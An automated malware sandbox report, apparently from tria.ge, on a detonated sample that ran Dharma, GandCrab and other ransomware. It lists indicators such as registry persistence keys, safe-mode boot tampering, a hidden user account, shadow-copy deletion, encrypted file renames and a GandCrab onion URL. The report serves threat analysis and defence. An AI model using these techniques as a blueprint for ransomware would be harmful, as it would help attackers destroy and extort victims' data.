Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
05/02/2025, 09:34
250205-lj3hzaskdm 102/02/2025, 14:19
250202-rmz5xavnfw 402/02/2025, 14:17
250202-rl3veavnc1 402/02/2025, 00:22
250202-an9bjaynfr 1002/02/2025, 00:12
250202-ahevqsylfm 1002/02/2025, 00:08
250202-ae1m2awpbt 1002/02/2025, 00:04
250202-acl2vsykbm 10Analysis
-
max time kernel
212s -
max time network
210s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250128-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
02/02/2025, 00:08
Static task
static1
Behavioral task
behavioral1
Sample
b231263f-0b92-4f02-9e71-3d6a05534490.jpg
Resource
win10ltsc2021-20250128-en
Errors
General
-
Target
b231263f-0b92-4f02-9e71-3d6a05534490.jpg
-
Size
26KB
-
MD5
99cfb36285d82796d745c8a199f6acff
-
SHA1
ab990d5b00d7878178a6e77553152149ce4f56c3
-
SHA256
afc3ff71d364c14eecc12918e7c00a435943005fc86dafa53da529f0a9c95285
-
SHA512
3a9558a9e628aac5af58f98a9e7056fe5a2741517067f0f9ebac9a800d6bd564433ab0b3910746f99e82573d2ba176241ce3d3b25961a6c27ae828c0d4defd26
-
SSDEEP
768:Z3Bt4w6U03dxH1/ARsjefQIbwTj5pW0JPfmXkD+lakhXOsX0:Z3BtNZAdxHdARkef7bQ5I8POEqY
Malware Config
Extracted
\Device\HarddiskVolume1\$RECYCLE.BIN\ADHLFQB-MANUAL.txt
gandcrab
http://gandcrabmfe6mnef.onion/a79f35db2daa3087
Signatures
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 3792 net.exe 2824 net1.exe -
Renames multiple (113) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (245) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Downloads MZ/PE file 4 IoCs
flow pid Process 85 2268 msedge.exe 85 2268 msedge.exe 85 2268 msedge.exe 85 2268 msedge.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1280 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4860 attrib.exe -
Sets service image path in registry 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\hjubzxoikmwdrbiv\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\hjubzxoikmwdrbiv.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dxhyvquwxmzrokdf\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\dxhyvquwxmzrokdf.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\rpmuptzhkqmqdj\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\rpmuptzhkqmqdj.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qiwxkllcnwvbwfmxg\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\qiwxkllcnwvbwfmxg.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\nqekkuxuvtalqgr\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\nqekkuxuvtalqgr.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\hzbntjtujfideuji\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\hzbntjtujfideuji.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\vomweobolnmuezb\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\vomweobolnmuezb.sys" mssql.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2839013668-2276131261-2828740280-1000\Control Panel\International\Geo\Nation Dharma.exe Key value queried \REGISTRY\USER\S-1-5-21-2839013668-2276131261-2828740280-1000\Control Panel\International\Geo\Nation GandCrab.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1sass.exe 1sass.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\ADHLFQB-MANUAL.txt GandCrab.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\2daa376b2daa30837a.lock GandCrab.exe -
Executes dropped EXE 8 IoCs
pid Process 464 Dharma.exe 1648 nc123.exe 2232 mssql.exe 4236 mssql2.exe 3524 SearchHost.exe 3204 1sass.exe 5636 Fantom.exe 5232 GandCrab.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\rpmuptzhkqmqdj.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\HZBNTJTUJFIDEUJI.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vomweobolnmuezb.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\HJUBZXOIKMWDRBIV.SYS mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\DXHYVQUWXMZROKDF.SYS mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\VOMWEOBOLNMUEZB.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dxhyvquwxmzrokdf.sys mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\nqekkuxuvtalqgr.sys mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hjubzxoikmwdrbiv.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\NQEKKUXUVTALQGR.SYS mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\RPMUPTZHKQMQDJ.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hzbntjtujfideuji.sys mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\qiwxkllcnwvbwfmxg.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\QIWXKLLCNWVBWFMXG.SYS mssql.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1sass.exe = "C:\\Windows\\System32\\1sass.exe" 1sass.exe -
Drops desktop.ini file(s) 15 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini 1sass.exe File opened for modification C:\Program Files\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini 1sass.exe File opened for modification C:\Program Files (x86)\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini 1sass.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2839013668-2276131261-2828740280-1000\desktop.ini 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini 1sass.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini 1sass.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-2839013668-2276131261-2828740280-1000\desktop.ini 1sass.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: GandCrab.exe File opened (read-only) \??\T: GandCrab.exe File opened (read-only) \??\U: GandCrab.exe File opened (read-only) \??\I: GandCrab.exe File opened (read-only) \??\L: GandCrab.exe File opened (read-only) \??\M: GandCrab.exe File opened (read-only) \??\P: GandCrab.exe File opened (read-only) \??\Q: GandCrab.exe File opened (read-only) \??\X: GandCrab.exe File opened (read-only) \??\H: GandCrab.exe File opened (read-only) \??\N: GandCrab.exe File opened (read-only) \??\W: GandCrab.exe File opened (read-only) \??\Y: GandCrab.exe File opened (read-only) \??\Z: GandCrab.exe File opened (read-only) \??\A: nc123.exe File opened (read-only) \??\D: GandCrab.exe File opened (read-only) \??\G: GandCrab.exe File opened (read-only) \??\K: GandCrab.exe File opened (read-only) \??\S: GandCrab.exe File opened (read-only) \??\E: SearchHost.exe File opened (read-only) \??\B: GandCrab.exe File opened (read-only) \??\J: GandCrab.exe File opened (read-only) \??\O: GandCrab.exe File opened (read-only) \??\V: GandCrab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 84 raw.githubusercontent.com 85 raw.githubusercontent.com -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\1sass.exe 1sass.exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ExpenseReport.xltx 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\WindowsBase.resources.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de\System.Windows.Forms.Design.resources.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme-2x.png.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-180.png 1sass.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview.png.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.IO.FileSystem.AccessControl.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js 1sass.exe File opened for modification C:\Program Files\desktop.ini.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL054.XML 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Globalization.dll 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files\Microsoft Office\root\rsod\powerpointmui.msi.16.en-us.tree.dat.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Collections.Concurrent.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ru_get.svg 1sass.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\EdgeWebView.dat.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js 1sass.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\LICENSE 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Microsoft.CSharp.dll 1sass.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-140.png.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.ServiceModel.Web.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\Word 2010 look.dotx.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-2x.png.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans\UIAutomationClientSideProviders.resources.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Linq.dll 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\ui-strings.js 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\optimize_poster.jpg.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\123.0.6312.123.manifest.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\giflib.md.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru\PresentationFramework.resources.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\tr\UIAutomationClient.resources.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.nl-nl.dll 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.ServicePoint.dll 1sass.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Diagnostics.Tracing.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\UIAutomationClientSideProviders.resources.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl\UIAutomationTypes.resources.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsrus.xml 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil_2x.png 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.IO.Compression.dll.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\ui-strings.js 1sass.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.Primitives.dll 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif 1sass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\ui-strings.js.id-2DAA3087.[[email protected]].ROGER 1sass.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libxml2.md.id-2DAA3087.[[email protected]].ROGER 1sass.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5060 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mssql2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fantom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GandCrab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1sass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nc123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SearchHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dharma.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GandCrab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GandCrab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier GandCrab.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7332 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2839013668-2276131261-2828740280-1000\Software\Microsoft\Internet Explorer\TypedURLs taskmgr.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2839013668-2276131261-2828740280-1000_Classes\Local Settings taskmgr.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 864553.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 721579.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 855476.crdownload:SmartScreen msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
